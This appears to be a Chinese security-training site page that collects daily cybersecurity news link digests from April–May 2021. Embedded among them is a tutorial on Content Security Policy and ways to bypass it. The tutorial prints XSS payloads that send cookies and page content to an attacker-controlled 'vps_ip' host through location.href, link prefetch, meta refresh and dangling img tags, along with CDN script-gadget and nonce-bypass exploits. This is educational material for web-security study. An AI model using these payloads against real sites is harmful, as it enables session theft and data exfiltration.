网络安全日报 2021年05月06日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、TBONE(Tesla 的一些安全漏洞)细节公开
https://kunnamon.io/tbone/2、ATT&CK 发布了 v9 更新
https://medium.com/mitre-attack/attack-april-2021-release-39accaf23c813、AgeLocker勒索软件针对QNAP NAS设备
https://securityaffairs.co/wordpress/117424/malware/qnap-agelocker-ransomware.html4、BIND软件中的缺陷使DNS服务器容易受到攻击
https://securityaffairs.co/wordpress/117414/security/bind-dns-servers-flaws.html5、Babuk团队宣布将停止勒索软件攻击
https://securityaffairs.co/wordpress/117407/cyber-crime/babuk-stops-ransomware-attacks.html6、UNC2447在SonicWall零日漏洞修复之前就利用了该漏洞
https://securityaffairs.co/wordpress/117387/malware/unc2447-sonicwall-zero-day.html7、网络安全社区对GitHub有关漏洞利用相关政策更新不满意
https://www.securityweek.com/cybersecurity-community-unhappy-githubs-proposed-policy-updates8、微软警告OT、物联网设备中的BadAlloc漏洞
https://securityaffairs.co/wordpress/117372/iot/badalloc-vulnerabilities-ot-iot.html9、SolarMarket RAT使用Google SEO策略引诱受害者
https://cyware.com/news/solarmarket-rat-uses-google-seo-tactics-to-lure-victims-46b85a6410、Water Pamola通过恶意订单攻击在线商店
https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html
网络安全日报 2021年04月30日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、安全研究人员发现IoT和OT设备中的多个高危安全漏洞
https://www.securityweek.com/badalloc-microsoft-flags-major-security-holes-ot-iot-devices
2、DigitalOcean通知客户某些账单信息遭泄露
https://www.securityweek.com/digitalocean-discloses-breach-involving-billing-information
3、苹果修复了影响M1芯片Mac的安全绕过漏洞
https://www.securityweek.com/apple-patches-security-bypass-vulnerability-impacting-macs-m1-chip
4、Cisco修复了影响其防火墙产品的多个高危漏洞
https://www.securityweek.com/several-high-severity-vulnerabilities-expose-cisco-firewalls-remote-attacks
5、PHP Composer修复了可导致供应链攻击的高危命令注入漏洞
https://securityaffairs.co/wordpress/117366/security/php-composer-flaw.html
6、意大利最大的合作信贷银行之一BCC遭勒索软件攻击
https://securityaffairs.co/wordpress/117360/cyber-crime/banca-di-credito-cooperativo-darkside-ransomware.html
7、卡巴斯基发现与CIA关联的新型恶意软件Purple Lambert
https://securityaffairs.co/wordpress/117340/apt/purple-lambert-cia-arsenal.html
8、360 Netlab发现了隐藏3年名为RotaJakiro 的Linux后门
https://securityaffairs.co/wordpress/117332/breaking-news/rotajakiro-linux-backdoor.html
9、Experian API泄露了大多数美国人的信用评分
https://threatpost.com/experian-api-leaks-american-credit-scores/165731/
10、流行的OGUsers黑客论坛再次遭到黑客入侵
https://www.bleepingcomputer.com/news/security/fourth-times-a-charm-ogusers-hacking-forum-hacked-again/
网络安全日报 2021年04月29日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Google在Chrome中修补了一个严重的V8漏洞
https://www.securityweek.com/google-patches-yet-another-serious-v8-vulnerability-chrome2、英国铁路网络Merseyrail遭勒索软件攻击
https://securityaffairs.co/wordpress/117312/malware/merseyrail-lockbit-ransomware.html3、研究发现云配置错误是云安全的主要风险
https://securityaffairs.co/wordpress/117305/security/cloud-misconfiguration-risks.html4、CISA和NIST联合发布有关供应链攻击的咨询报告
https://securityaffairs.co/wordpress/117286/hacking/cisa-nist-supply-chain-attacks.html5、RedLine Stealer恶意软件伪装成电报安装程序
https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer6、DARPA展示了将零知识证明用于软件漏洞披露过程
https://www.scmagazine.com/home/security-news/vulnerabilities/darpa-is-creating-zero-knowledge-proofs-for-vulnerability-disclosure/7、新的WickrMe勒索软件针对SharePoint服务器以渗透企业网络
https://therecord.media/ransomware-gang-targets-microsoft-sharepoint-servers/8、F5 BIG-IP被发现容易受到Kerberos KDC欺骗漏洞的攻击
https://thehackernews.com/2021/04/f5-big-ip-found-vulnerable-to-kerberos.html9、FluBot Android银行恶意软件在欧洲迅速蔓延
https://thehackernews.com/2021/04/attention-flubot-android-banking.html10、安全团队在Linux内核发现信息泄露漏洞
https://blog.talosintelligence.com/2021/04/vuln-spotlight-linux-kernel.html
CSP浅析与绕过
你是否正在收集各类网安网安知识学习,蚁景网安实验室为你总结了1300+网安技能任你学,https://www.yijinglab.com/loginLab.do#stu>>
XSS是最常见、危害最大的网页安全漏洞,想要抵御它们,要采取非常多编程措施,非常麻烦。那么,有没有可以从根本上解决问题,浏览器自动禁止外部注入恶意脚本的方法呢?CSP应运而生。
本文涉及相关实验:https://www.yijinglab.com/expc.do?ec=ECIDee9320adea6e062017110316534000001 (实验介绍了CSP防御机制的基本原理,利用script gadget绕过CSP,进而实施XSS攻击,并对攻击原理和过程进行分析。)
什么是CSP
CSP(Content Security Policy,内容安全策略),是网页应用中常见的一种安全保护机制,它实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,哪些不可以
CSP如何工作
通过响应包头(Response Header)实现:
Content-Security-policy: default-src 'self'; script-src 'self' allowed.com; img-src 'self' allowed.com; style-src 'self';
通过HTML 元标签实现:
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
CSP指令
我们可以看出,有一部分是CSP中常用的配置参数指令,我们也是通过这些参数指令来控制引入源,下面列举说明:
script-src:外部脚本
style-src:样式表
img-src:图像
media-src:媒体文件(音频和视频)
font-src:字体文件
object-src:插件(比如 Flash)
child-src:框架
frame-ancestors:嵌入的外部资源(比如<frame>、<iframe>、<embed>和<applet>)
connect-src:HTTP 连接(通过 XHR、WebSockets、EventSource等)
worker-src:worker脚本
manifest-src:manifest 文件
dedault-src:默认配置
frame-ancestors:限制嵌入框架的网页
base-uri:限制<base#href>
form-action:限制<form#action>
block-all-mixed-content:HTTPS 网页不得加载 HTTP 资源(浏览器已经默认开启)
upgrade-insecure-requests:自动将网页上所有加载外部资源的 HTTP 链接换成 HTTPS 协议
plugin-types:限制可以使用的插件格式
sandbox:浏览器行为的限制,比如不能有弹出窗口等。
除了Content-Security-Policy,还有一个Content-Security-Policy-Report-Only字段,表示不执行限制选项,只是记录违反限制的行为。它必须与report-uri选项配合使用。
Content-Security-Policy-Report-Only: default-src 'self'; ...; report-uri /my_amazing_csp_report_parser;
CSP指令值
介绍完CSP的指令,下面介绍一下指令值,即允许或不允许的资源
*: 星号表示允许任何URL资源,没有限制;
self: 表示仅允许来自同源(相同协议、相同域名、相同端口)的资源被页面加载;
data:仅允许数据模式(如Base64编码的图片)方式加载资源;
none:不允许任何资源被加载;
unsafe-inline:允许使用内联资源,例如内联<script>标签,内联事件处理器,内联<style>标签等,但出于安全考虑,不建议使用;
nonce:通过使用一次性加密字符来定义可以执行的内联js脚本,服务端生成一次性加密字符并且只能使用一次;
下面通过具体的例子来看看CSP指令和指令值的用法:
<img src=image.jpg> 该图片来自https://example.com将被允许载入,因为是同源资源;
<script src=script.js> 该js脚本来自https://example.com将被允许载入,因为是同源资源;
<script src=https://examples.com/script.js>,该js脚本将不允许被加载执行,因为来自https://examples.com, 非同源;
CSP绕过
CSP从诞生时起即有安全研究人员所探索,本文总结部分方法
在开始之前,我们都可以将相应的CSP政策丢上Google 提供的 https://csp-evaluator.withgoogle.com/检测一波,有奇效(手动滑稽)
location.href绕过
href 属性是一个可读可写的字符串,可设置或返回当前显示的文档的完整 URL。
CSP不影响location.href跳转,因为在大多数网站中的跳转功能都是靠前端实现的,如果限制跳转将会使网站很大一部分功能受到影响,所以利用跳转来绕过CSP是一个万能的方法;或者存在script-src 'unsafe-inline';这条规则也可以用该绕过方法
demo
<?php if (!isset($_COOKIE['a'])) { setcookie('a',md5(rand(0,1000))); } header("Content-Security-Policy: default-src 'self';"); ?> <!DOCTYPE html> <html> <head> <title>CSP Test</title> </head> <body> <h2>CSP-safe</h2> <?php if (isset($_GET['a'])) { echo "Your GET content".@$_GET['a']; }// ?>
这个地方可以用location跳转:location.href(window.location/window.open)绕过
exp
?a=<script>location.href="http://127.0.0.1"+document.cookie;</script>
在我们已经可以执行任意js脚本但由于CSP的阻拦我们的cookie无法带外传输,就可以用此方法
location.href = "vps_ip:xxxx?"+document.cookie
可以执行任意js脚本,但由于CSP无法数据外带
CSP为script-src 'unsafe-inline'
link标签预加载导致的绕过
这是个老办法了,在大部分浏览器都已经约束了该标签,但是老浏览器可能还可行
<!-- firefox --> <link rel="dns-prefetch" href="//${cookie}.vps_ip"> <!-- chrome --> <link rel="prefetch" href="//vps_ip?${cookie}">
那我们该如何将数据外带呢
动态构建元素,再引发页面跳转
var link = document.createElement("link"); link.setAttribute("rel", "prefetch"); link.setAttribute("href", "//vps_ip/?" + document.cookie); document.head.appendChild(link);
这样就可以将cookie外带了
可以执行任意js脚本,但由于CSP无法外带数据
meta网页跳转绕过
与link标签原理相似,利用meta标签实现网页跳转
http://127.0.0.1/csp.php?xss==<meta http-equiv="refresh" content="1;url=http://150.158.188.194:7890/" >
除此之外,meta标签还有一些不常用的功能有时也能起奇效
meta可以控制缓存(在header没有设置的情况下),有时候可以用来绕过CSP nonce。
<meta http-equiv="cache-control" content="public">
meta可以设置Cookie(Firefox下),可以结合self-xss利用
<meta http-equiv="Set-Cookie" Content="cookievalue=xxx;expires=Wednesday,21-Oct-98 16:14:21 GMT; path=/">
meta这一被很多人忽略的标签,其实可以做到的东西也不少,后面有机会会进一步分析
iframe绕过
iframe 元素会创建包含另外一个文档的内联框架(即行内框架),我们可以通过设置这个来做到一个跨域访问,这其中就有安全问题了,但是今天要用到的并不是这些
在CSP中,通过配置sandbox和child-src可以设置iframe的有效地址,它限制适iframe的行为,包括阻止弹出窗口,防止插件和脚本的执行,而且可以执行一个同源策略。
同源 这才是主角,当一个同源站点存在两个页面,我们称它们为A页面和B页面,假如A页面有CSP保护,而B页面没有,我们就可以直接在B页面新建iframe用js操作A页面的DOM,也就是说A页面的CSP防护完全失效
demo&exp
<!-- A页面 --> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'"> <h1 id="flag">flag{0xffff}</h1> <!-- B页面 --> <!-- 下面模拟XSS --> <body> <script> var iframe = document.createElement('iframe'); iframe.src="http://127.0.0.1/a.php"; document.body.appendChild(iframe)
setTimeout是为了等待iframe加载完成
你以为就这样就完了?那你果然和我一样天真了
在找CSP绕过相关资料时,还发现了个好玩的东西(https://www.jianshu.com/p/f1de775bc43e)
在Chrome下,iframe标签支持csp属性,这有时候可以用来绕过一些防御,例如"http://xxx"页面有个js库会过滤XSS向量,我们就可以使用csp属性来禁掉这个js库。
<iframe csp="script-src 'unsafe-inline'" src="http://xxx"></iframe>
一个同源站点存在两个页面,其中一个有CSP保护,一个没有且存在xss漏洞
我们要的数据在存在CSP保护的页面中
CDN绕过
一般来说,前端要用到许多的前端框架和库,而部分企业为了效率或者其他原因,会选择使用其他CDN上的js框架,当这些CDN上存在一些低版本的框架时,就可能存在绕过CSP的风险
这里借Orange大神绕过hackmd CSP的文章(https://paper.seebug.org/855/)来分析一波
demo
先来看hackmd的CSP策略
content-security-policy: script-src 'self' vimeo.com https://gist.github.com www.slideshare.net https://query.yahooapis.com 'unsafe-eval' https://cdnjs.cloudflare.com https://cdn.mathjax.org https://www.google.com https://apis.google.com https://docs.google.com https://www.dropbox.com https://*.disq
看到了unsafe-eval这个关键字,可以想到Breaking XSS mitigations via Script Gadgets手法,但我们继续往下看就会发现,其实没这么复杂,因为该CSP政策还允许了https://cdnjs.cloudflare.com/这个js hosting服务,这个提供了很多第三方的函数库以供引入,这样我们就可以直接借助AngularJS 函数库以及Client-Side Template Injection里面成熟的沙盒逃逸技术绕过
再因为原本WAF对注释的完全可信,可以构造出<!-- foo="bar--><script>alert(1)</script>>" -->这一payload,用-->来闭合前面的注释,来让后面内容完全可控
两者结合,得出最终payload
exp
<!-- foo="--> <script src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.min.js> </script> <div ng-app> {{constructor.constructor('alert(document.cookie)')()}} </div> //sssss" -->
详细内容看Orange师傅的文章
如果用了Jquery-mobile库,且CSP中包含"script-src 'unsafe-eval'"或者"script-src 'strict-dynamic'",可以用此exp
<div data-role=popup id='<script>alert(1)</script>'></div>
还比如RCTF2018题目出现的AMP库,下面的标签可以获取名字为FLAG的cookie
<amp-pixel src="http://your domain/?cid=CLIENT_ID(FLAG)"></amp-pixel>
总而言之,这一绕过方法主要可以套用网上相应的payload格式来绕过CSP,在https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf中总结了可以被用来CDN绕过的一些JS库,可以用作参考
CDN服务商存在低版本的js库
该CDN服务商在CSP白名单中
站点可控静态资源绕过
给一个绕过codimd的(实例)https://github.com/k1tten/writeups/blob/master/bugbounty_writeup/HackMD_XSS_&_Bypass_CSP.md
案例中codimd的CSP中使用了http://www.google-analytics.com 而http://www.google.analytics.com中提供了自定义javascript的功能(google会封装自定义的js,所以还需要unsafe-eval),于是可以绕过CSP
demo
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'unsafe-eval' https://www.google-analytics.com"> <script src="https://www.google-analytics.com/gtm/js?id=GTM-PJF5W64"></script>
exp
同理,在其他站点提供了可控静态资源的功能时,且CSP中允许了此站点,就可以用该方式绕过
存在可控静态资源
站点在CSP允许名单中
不完整script标签绕过
我们先来了解一个小知识(敲黑板):当浏览器碰到一个左尖括号时,会变成标签开始状态,然后会一直持续到碰到右尖括号为止,在其中的数据都会被当成标签名或者属性
好,我们开搞
demo1
<?php header("X-XSS-Protection:0");?> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-xxxxx'"> <?php echo $_GET['xss']?> <script nonce='xxxxx'> //do some thing </script>
exp
当我们输入http://127.0.0.1/2.php?xss=<script src=data:text/plain,alert(1),我们可以发现<script就会被变成一个属性,值为空,之后的nonce='xxxxx'
会被当成我们输入的script标签中的一个属性,成功绕过script-src
demo2
但是在chrome中,虽然第二个<script 被当成了属性名,但依旧会干扰chrome对标签的解析,造成错误,使我们的exp无法成功执行 https://xzfile.aliyuncs.com/media/upload/picture/20190511094533-772405ea-738e-1.png
exp
这里可以用到标签的一个技巧,当一个标签存在两个同名属性时,第二个属性的属性名及其属性值都会被浏览器忽略
<!-- 3.php --> <h1 a="123" b="456" a="789" a="abc">123</h1>
https://xzfile.aliyuncs.com/media/upload/picture/20190511094533-772ac830-738e-1.png于是我们可以输入 http://127.0.0.1/2.php?xss=123<script src="data:text/plain,alert(1)" a=123 a= 先新建一个a属性,然后再新建第二个a属性,这样我们就将第二个<script赋给了第二个a属性,浏览器在解析的时候直接忽略了第二个属性及其后面的值,这样exp就能成功在chrome浏览器上执行 https://xzfile.aliyuncs.com/media/
可控点在合法script标签上方,且其中没有其他标签
XSS页面的CSP script-src只采用了nonce方式
不完整的资源标签获取资源
demo
<meta http-equiv="Content-Security-Policy" content="default-src 'self';script-src 'self'; img-src *;"> <?php echo $_GET['xss']?> <h1>flag{0xffff}</h1> <h2 id="id">3</h2>
这里可以注意到img用了*,有些网站会用很多外链图片,所以这个情况并不少见,虽然我们可以新建任意标签,但是由于CSP我们的JS并不能执行(没有unsafe-inline),于是我们可以用不完整的<img标签来将数据带出
exp
http://127.0.0.1/csp.php?xss=<img src="//vps_ip?a=
此时由于我们传入的src的引号没有闭合,html解析器会一直寻找第二个引号,而直到”id“前的引号出现之前,所有内容都会被当作src的值发送到我们的vps上
需要注意的是,chrome下这个exp并不会成功,因为chrome不允许发出的url中含有回车或<
可以加载外域资源 (img-src: *)
需要获取页面某处的信息
302(重定向)绕过
很多时候一个网站都会带有一个302跳转功能的页面,用它来导向到本站的资源或者是外部的链接 我们首先看一下w3c文档里关于重定向的说明https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects
很明显的,如果我们的script-src设置为某个目录,通过这个目录下的302跳转,是可以绕过csp读取到另一个目录下的脚本的。
接下来就来模拟分析一波
demo
<!-- csp.php --> <?php header("Content-Security-Policy: default-src 'self';script-src http://127.0.0.1/a/"); ?> <html> <head> </head> <body> csp header test </body> </html> <!-- redirect.php --> <?php header("Location: " . $_GET[url]); ?> <!-- test.php --> <!DOCTYPE html> <html> <head> <title>1</tit
csp限制了/a/目录,而我们的目标脚本在/b/目录下则如果这时候请求redirect页面去访问/b/下的脚本是可以通过csp的检查的
exp
http://127.0.0.1/a/redirect.php?url=/b/test.php
但这是有一个很严格的条件的,加载的资源所在的域必须和自身处于同域下(example.com),也就是不可能通过302跳转去加载一个其他域下的脚本的,比如通过a.com的302跳转去加载b.com下的脚本是不可以
但!又来个但是了,在实际环境中,比如某个站调用某个cdn,或者类似于script-src example.com/scripts/ google.com/recaptcha/,google.com/script/*下有个evil.js,然后刚好站内有个重定向,漏洞条件就已经成立了。
在script-src允许的域下,需要存在一个重定向的页面,这种页面大多存在于登陆,退出登录
在script-src允许的域下,存在某个任意文件的上传点(任意目录)
有特别的方式可以跨域发送请求,或者有站内域可以接受请求
如果看完这一篇还不过瘾的话可以去实验室做实验继续学习哦。
网络安全日报 2021年04月28日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、FBI / DHS针对俄罗斯黑客入侵联合发布防御指南
https://www.securityweek.com/fbidhs-issue-guidance-network-defenders-mitigate-russian-gov-hacking2、美国空军采用零信任来改善和保护其飞行线路运营
https://www.securityweek.com/us-air-force-adopts-zero-trust-secure-flightline-operations3、Adobe发布开源异常检测工具“ OSAS”
https://www.securityweek.com/adobe-releases-open-source-anomaly-detection-tool-osas4、Eaton产品中存在可允许黑客破坏电源的漏洞
https://www.securityweek.com/vulnerabilities-eaton-product-can-allow-hackers-disrupt-power-supply5、Apple修补了“ Shlayer”恶意软件利用的macOS安全绕过漏洞
https://www.securityweek.com/apple-patches-macos-security-bypass-vulnerability-exploited-shlayer-malware6、奥尔巴尼附近的Guilderland中央学区遭勒索软件攻击
https://securityaffairs.co/wordpress/117281/cyber-crime/school-district-albany-ransomware.html7、Microsoft Defender使用Intel TDT技术来对抗挖矿恶意软件
https://securityaffairs.co/wordpress/117272/security/microsoft-defender-tdt.html8、FBI与HIBP共享了Emotet恶意活动中的400万个电子邮件地址
https://securityaffairs.co/wordpress/117294/malware/emotet-hibp.html9、哥伦比亚特区大都会警察局遭勒索软件攻击
https://thehackernews.com/2021/04/hackers-threaten-to-leak-dc-police.html10、Nvidia披露GPU驱动和vGPU软件中存在严重漏洞
https://threatpost.com/nvidia-security-bugs-gpu-vgpu/165597/
网络安全日报 2021年04月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、Apple iOS 14.5修补了50个安全漏洞
https://www.securityweek.com/apple-ios-145-patches-50-security-vulnerabilities2、一种新发现的NTLM中继攻击利用RPC协议漏洞提权
https://www.securityweek.com/ntlm-relay-attack-abuses-windows-rpc-protocol-vulnerability3、明尼苏达大学研究人员向Linux内核维护者道歉
https://thehackernews.com/2021/04/minnesota-university-apologizes-for.html4、32亿个密码泄露并包含150W与政府邮件地址相关的密码
https://thehackernews.com/2021/04/32-billion-leaked-passwords-contain-15.html5、2.5亿美国人敏感信息在黑客论坛泄露
https://www.hackread.com/hacker-dumps-household-records-of-americans/6、NFC论坛规范为NFC应用程序开发提供加密安全性
https://www.helpnetsecurity.com/2021/04/26/nfc-forum-specifications/7、美国防部通过BGP通告了数百万个IP地址
https://www.washingtonpost.com/technology/2021/04/24/pentagon-internet-address-mystery/8、勒索团伙利用7zip加密文件获利26万美元
https://www.bleepingcomputer.com/news/security/a-ransomware-gang-made-260-000-in-5-days-using-the-7zip-utility/9、法国香槟集团Laurent Perrier遭网络攻击
https://www.reuters.com/article/uk-france-champagne-laurentperrier/french-champagne-group-laurent-perrier-has-been-victim-of-cyber-attack-idUKKBN2CB0L510、采矿技术公司Gyrodata受勒索软件攻击-员工数据泄漏
https://portswigger.net/daily-swig/mining-technology-company-gyrodata-hit-by-ransomware-attack-employee-data-leaked
网络安全日报 2021年04月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、黑客利用FileZen文件共享服务器漏洞窃取敏感数据
https://securityaffairs.co/wordpress/117208/hacking/soliton-filezen-file-sharing-servers.html2、ABUS Secvest家庭安防系统存在漏洞可被远程禁用
https://securityaffairs.co/wordpress/117190/hacking/10000-vulnerable-abus-secvest.html3、Valve修复Steam游戏平台中一个RCE漏洞
https://portswigger.net/daily-swig/valve-belatedly-fixes-steam-gaming-platform-rce-vulnerability4、研究人员在Kubernetes中发现恶意活动
https://unit42.paloaltonetworks.com/unsecured-kubernetes-instances/5、黑客创建虚假DirectX 12网站被用于分发恶意软件
https://www.bleepingcomputer.com/news/security/fake-microsoft-directx-12-site-pushes-crypto-stealing-malware/6、Avast研究人员揭示VB恶意代码隐藏数据常用手段
https://decoded.avast.io/davidzimmer/binary-data-hiding-in-vb6-executables/7、专家演示了利用吸尘器隐藏攻击设备的Evil Maid Attack
https://securityaffairs.co/wordpress/117139/hacking/evil-maid-attack-vacuum-hack.html8、Darkside勒索软件团伙正加强其勒索策略以影响受害者股价
https://securityaffairs.co/wordpress/117130/malware/darkside-ransomware-stock-price.html9、黑客泄露大约2000万个BigBasket用户数据
https://www.bleepingcomputer.com/news/security/hacker-leaks-20-million-alleged-bigbasket-user-records-for-free/10、Emotet恶意软件已从全球所有受感染的计算机中自我卸载
https://www.bleepingcomputer.com/news/security/emotet-malware-nukes-itself-today-from-all-infected-computers-worldwide/
网络安全日报 2021年04月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、新型勒索软件Qlocker每天感染数百台QNAP NAS设备
https://securityaffairs.co/wordpress/117144/malware/qlocker-ransomware-infections.html2、新的Linux僵尸网络滥用IaC工具进行传播
https://securityaffairs.co/wordpress/117155/malware/linux-botnet-emerging-techniques.html3、Homebrew软件包管理器发现了严重的RCE漏洞
https://thehackernews.com/2021/04/critical-rce-bug-found-in-homebrew.html4、Prometei僵尸网络利用未修复的Exchange Server
https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html5、CocoaPods供应链攻击影响多达300W个移动应用
https://portswigger.net/daily-swig/cocoapods-rce-exploit-exposed-keys-to-repo-used-by-three-million-mobile-apps6、Passwordstate密码管理器遭受供应链攻击
https://www.csis.dk/newsroom-blog-overview/2021/moserpass-supply-chain/7、网络钓鱼活动冒充招聘公司分发恶意软件
https://www.bleepingcomputer.com/news/security/phishing-impersonates-global-recruitment-firm-to-push-malware/8、美国连锁零售商超Costco发布网络诈骗警告
https://www.infosecurity-magazine.com/news/costco-issues-scam-warning/9、基于Golang的新挖矿僵尸网络Sysrv针对流行的企业应用
https://therecord.media/sysrv-a-new-crypto-mining-botnet-is-silently-growing-in-the-shadows/10、工信部勒令腾讯小米华为等五家应用商店整改
https://mp.weixin.qq.com/s/1v_bJum4hcCgmU4oR75FSw
网络安全日报 2021年04月23日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、趋势科技反病毒软件漏洞在野利用
https://securityaffairs.co/wordpress/117105/hacking/trend-micro-flaw-cve-2020-24557.html
2、Cellebrite移动取证工具存在任意代码执行漏洞
https://securityaffairs.co/wordpress/117116/mobile-2/cellebrite-forensics-tool-flaw.html
3、研究人员发现感染数百万Android设备的僵尸网络Pareto
https://securityaffairs.co/wordpress/117110/malware/pareto-botnet.html
4、网络犯罪者利用TG控制ToxicEye恶意软件
https://thehackernews.com/2021/04/cybercriminals-using-telegram-messenger.html
5、恶意软件FlixOnline冒充Netflix窃取WhatsApp对话数据
https://cyware.com/news/flixonline-poses-as-netflix-to-steal-whatsapp-conversations-data-a0ef3286
6、网络罪犯使用电报僵尸程序和Google表单自动进行网上诱骗
https://cyware.com/news/cybercriminals-use-telegram-bots-and-google-forms-for-automated-phishing-6bdaba1e
7、罗克韦尔工业交换机受思科软件中漏洞的影响
https://www.securityweek.com/rockwell-industrial-switches-affected-more-vulnerabilities-cisco-software
8、研究人员发现AirDrop存在泄露双方联系信息的风险
https://www.theregister.com/2021/04/22/airdrop_contact_leaks/
9、Rapid7 宣布收购Velociraptor
https://www.crn.com/news/security/rapid7-buys-velociraptor-to-attack-incident-response-market
10、安全团队发现针对彭博BNA用户的Fajan活动
https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html
网络安全日报 2021年04月22日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
1、SonicWall修复企业电子邮件安全设备3个0day漏洞
https://securityaffairs.co/wordpress/117075/hacking/sonicwall-es-zerodays.html
2、REvil勒索软件窃取了苹果公司产品图纸并索取赎金
https://securityaffairs.co/wordpress/117083/cyber-crime/revil-ransomware-apple-quanta.html
3、Oracle发布4月更新发布390个安全补丁
https://www.securityweek.com/oracle-delivers-390-security-fixes-april-2021-cpu
4、Chrome 发布紧急更新修复一个新的0day漏洞
https://www.securityweek.com/google-chrome-hit-another-mysterious-zero-day-attack
5、超过75W用户从Google Play下载了新的计费欺诈应用
https://thehackernews.com/2021/04/over-750000-users-download-new-billing.html
6、在线约会应用Manhunt遭数据泄露
https://www.infosecurity-magazine.com/news/dating-service-suffers-data-breach/
7、微软发布Windows 7、Server 2008本地提权漏洞部分补丁
https://www.bleepingcomputer.com/news/security/microsoft-partially-fixes-windows-7-server-2008-vulnerability/
8、QNAP修复了NAS设备中的关键RCE漏洞
https://portswigger.net/daily-swig/qnap-fixes-critical-rce-vulnerabilities-in-nas-devices
9、Django Debug Toolbar 修复了SQL注入漏洞
https://portswigger.net/daily-swig/django-debug-toolbar-tripped-up-by-sql-injection-flaw
10、能源供应商Eversource泄露客户个人数据
https://www.bleepingcomputer.com/news/security/eversource-energy-data-breach-caused-by-unsecured-cloud-storage/
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

